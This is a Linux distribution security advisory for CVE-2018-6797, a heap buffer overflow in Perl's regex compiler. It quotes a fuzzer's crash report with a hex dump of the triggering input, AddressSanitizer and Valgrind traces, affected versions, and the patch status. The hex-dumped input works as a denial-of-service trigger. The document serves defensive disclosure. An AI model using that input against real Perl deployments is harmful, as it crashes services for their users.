CLD-360 Details

Other IDs this deficiency may be known by:

CVE ID CVE-2018-6797 (nvd) (mitre) (debian) (archlinux) (red hat) (suse) (ubuntu)
Other ID(s)

Basic Information:

Affected Package(s) perl
Deficiency Type SECURITY
Date Created 2018-04-14 11:59:43
Date Last Modified 2018-04-14 15:46:46

Version Specific Information:

Cucumber 1.0 i686 waiting for upstream to publish patch
Cucumber 1.0 x86_64 waiting for upstream to publish patch

Cucumber 1.1 i686 fixed in perl-5.26.2-i686-1
Cucumber 1.1 x86_64 fixed in perl-5.26.2-x86_64-1

Details:

=================================== Overview ===================================

Heap-buffer-overflow (WRITE of size 1) in S_regatom (regcomp.c), allowing for a
denial of service.

================================ Initial Report ================================

From https://rt.perl.org/Public/Bug/Display.html?id=132227:

Triggered while fuzzing Perl v5.27.4-29-gdc41635.

od -tx1 ./test514
0000000 2f 30 30 5c 4e 7b 55 2b 30 7d df df df df df df
0000020 df 30 30 30 df df 30 2f 69
0000031

==28186==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60700000ac58 at pc 0x000000846c2d bp 0x7ffe716bc7f0 sp 0x7ffe716bc7e0
WRITE of size 1 at 0x60700000ac58 thread T0
    #0 0x846c2c in S_regatom /root/perl/regcomp.c:13652
    #1 0x8587f6 in S_regpiece /root/perl/regcomp.c:11708
    #2 0x8587f6 in S_regbranch /root/perl/regcomp.c:11633
    #3 0x88830a in S_reg /root/perl/regcomp.c:11371
    #4 0x8c90dc in Perl_re_op_compile /root/perl/regcomp.c:7363
    #5 0x5297d0 in Perl_pmruntime /root/perl/op.c:5888
    #6 0x74d853 in Perl_yyparse /root/perl/perly.y:1210
    #7 0x58b9b8 in S_parse_body /root/perl/perl.c:2450
    #8 0x593622 in perl_parse /root/perl/perl.c:1753
    #9 0x42eb7d in main /root/perl/perlmain.c:121
    #10 0x7fba4cebe82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #11 0x42fe18 in _start (/root/perl/perl+0x42fe18)

0x60700000ac58 is located 0 bytes to the right of 72-byte region [0x60700000ac10,0x60700000ac58)
allocated by thread T0 here:
    #0 0x7fba4dc62602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
    #1 0x92dfd4 in Perl_safesysmalloc /root/perl/util.c:153
    #2 0x8c6cbe in Perl_re_op_compile /root/perl/regcomp.c:7209
    #3 0x5297d0 in Perl_pmruntime /root/perl/op.c:5888
    #4 0x74d853 in Perl_yyparse /root/perl/perly.y:1210
    #5 0x58b9b8 in S_parse_body /root/perl/perl.c:2450
    #6 0x593622 in perl_parse /root/perl/perl.c:1753
    #7 0x42eb7d in main /root/perl/perlmain.c:121
    #8 0x7fba4cebe82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)

SUMMARY: AddressSanitizer: heap-buffer-overflow /root/perl/regcomp.c:13652 S_regatom

When tested against Perl 5.22.1 under Valgrind, the following occurs:

==5420== Invalid write of size 1
==5420==    at 0x52F178: Perl__to_fold_latin1 (in /usr/bin/perl)
==5420==    by 0x532904: Perl__to_uni_fold_flags (in /usr/bin/perl)
==5420==    by 0x4826E7: ??? (in /usr/bin/perl)
==5420==    by 0x48479C: ??? (in /usr/bin/perl)
==5420==    by 0x4798EA: ??? (in /usr/bin/perl)
==5420==    by 0x48E942: Perl_re_op_compile (in /usr/bin/perl)
==5420==    by 0x436377: Perl_pmruntime (in /usr/bin/perl)
==5420==    by 0x46CB15: Perl_yyparse (in /usr/bin/perl)
==5420==    by 0x442FB4: perl_parse (in /usr/bin/perl)
==5420==    by 0x41CB28: main (in /usr/bin/perl)
==5420==  Address 0x5b9dd88 is 0 bytes after a block of size 72 alloc'd
==5420==    at 0x4C2DB8F: malloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==5420==    by 0x498241: Perl_safesysmalloc (in /usr/bin/perl)
==5420==    by 0x48E5B4: Perl_re_op_compile (in /usr/bin/perl)
==5420==    by 0x436377: Perl_pmruntime (in /usr/bin/perl)
==5420==    by 0x46CB15: Perl_yyparse (in /usr/bin/perl)
==5420==    by 0x442FB4: perl_parse (in /usr/bin/perl)
==5420==    by 0x41CB28: main (in /usr/bin/perl)
==5420==
==5420== Invalid write of size 1
==5420==    at 0x52F17B: Perl__to_fold_latin1 (in /usr/bin/perl)
==5420==    by 0x532904: Perl__to_uni_fold_flags (in /usr/bin/perl)
==5420==    by 0x4826E7: ??? (in /usr/bin/perl)
==5420==    by 0x48479C: ??? (in /usr/bin/perl)
==5420==    by 0x4798EA: ??? (in /usr/bin/perl)
==5420==    by 0x48E942: Perl_re_op_compile (in /usr/bin/perl)
==5420==    by 0x436377: Perl_pmruntime (in /usr/bin/perl)
==5420==    by 0x46CB15: Perl_yyparse (in /usr/bin/perl)
==5420==    by 0x442FB4: perl_parse (in /usr/bin/perl)
==5420==    by 0x41CB28: main (in /usr/bin/perl)
==5420==  Address 0x5b9dd89 is 1 bytes after a block of size 72 alloc'd
==5420==    at 0x4C2DB8F: malloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==5420==    by 0x498241: Perl_safesysmalloc (in /usr/bin/perl)
==5420==    by 0x48E5B4: Perl_re_op_compile (in /usr/bin/perl)
==5420==    by 0x436377: Perl_pmruntime (in /usr/bin/perl)
==5420==    by 0x46CB15: Perl_yyparse (in /usr/bin/perl)
==5420==    by 0x442FB4: perl_parse (in /usr/bin/perl)
==5420==    by 0x41CB28: main (in /usr/bin/perl)
==5420==
==5420== Invalid write of size 1
==5420==    at 0x482311: ??? (in /usr/bin/perl)
==5420==    by 0x48479C: ??? (in /usr/bin/perl)
==5420==    by 0x4798EA: ??? (in /usr/bin/perl)
==5420==    by 0x48E942: Perl_re_op_compile (in /usr/bin/perl)
==5420==    by 0x436377: Perl_pmruntime (in /usr/bin/perl)
==5420==    by 0x46CB15: Perl_yyparse (in /usr/bin/perl)
==5420==    by 0x442FB4: perl_parse (in /usr/bin/perl)
==5420==    by 0x41CB28: main (in /usr/bin/perl)
==5420==  Address 0x5b9dd8c is 4 bytes after a block of size 72 alloc'd
==5420==    at 0x4C2DB8F: malloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==5420==    by 0x498241: Perl_safesysmalloc (in /usr/bin/perl)
==5420==    by 0x48E5B4: Perl_re_op_compile (in /usr/bin/perl)
==5420==    by 0x436377: Perl_pmruntime (in /usr/bin/perl)
==5420==    by 0x46CB15: Perl_yyparse (in /usr/bin/perl)
==5420==    by 0x442FB4: perl_parse (in /usr/bin/perl)
==5420==    by 0x41CB28: main (in /usr/bin/perl)
==5420==
panic: reg_node overrun trying to emit 0, 5b9dd90>=5b9dd88 at test514 line 1

============================ Additional Information ============================

See the entire thread at https://rt.perl.org/Public/Bug/Display.html?id=132227.

================================= Our Analysis =================================

----- Affected Products -----
We have verified in our lab environment that Perl 5.22.4 and 5.26.1 are both
vulnerable to this. This includes Perl as originally packaged in Cucumber Linux
1.0 and 1.1.

----- Scope and Impact of this Vulnerability -----
Allows for an attacker to cause a denial of service via a specially crafted
regex.

----- Testing if you are Affected -----
You can test if Perl is affected on your system by running the perl script from
https://rt.perl.org/Ticket/Attachment/1528262/815123/132227b.pl. If it results
in a Perl panic, you are affected.

----- Fix for this Vulnerability -----
For Perl 5.26, this vulnerability can be fixed by upgrading to Perl 5.26.2 or by
applying the patch from commit
https://perl5.git.perl.org/perl.git/commitdiff/abe1e6c568b96bcb382dfa4f61c56d1ab001ea51.

For Perl 5.22, the patch is not easily backportable and the Perl developers have
expressed that they do not intend to make a patch for it, despite Perl 5.22
still being "officially supported." We are looking for a way to fix this for
Perl 5.22.

================================= Our Solution =================================

Cucumber Linux 1.1:
We have upgraded to Perl 5.26.2.

Cucumber Linux 1.0:
We are searching for a solution.